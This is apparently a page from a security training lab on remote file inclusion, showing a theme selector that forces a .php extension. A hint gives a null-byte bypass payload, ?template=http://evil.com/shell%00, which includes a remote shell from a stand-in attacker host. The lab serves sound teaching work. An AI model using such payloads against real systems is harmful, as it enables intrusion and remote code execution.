RFI Lab 2 - Null Byte Extension Bypass


Theme Selector

This page loads templates via ?template=name and always appends .php.

Can you include a remote file despite the forced extension?

Templates: default | dark


Dark template loaded.

Resolved file: dark.php

Hint (click to reveal)

The server appends .php to your input. In PHP < 5.3.4, a null byte (%00) terminates the string, stripping the extension.
Try: ?template=http://evil.com/shell%00
The server would include http://evil.com/shell instead of http://evil.com/shell.php.


Back to RFI Labs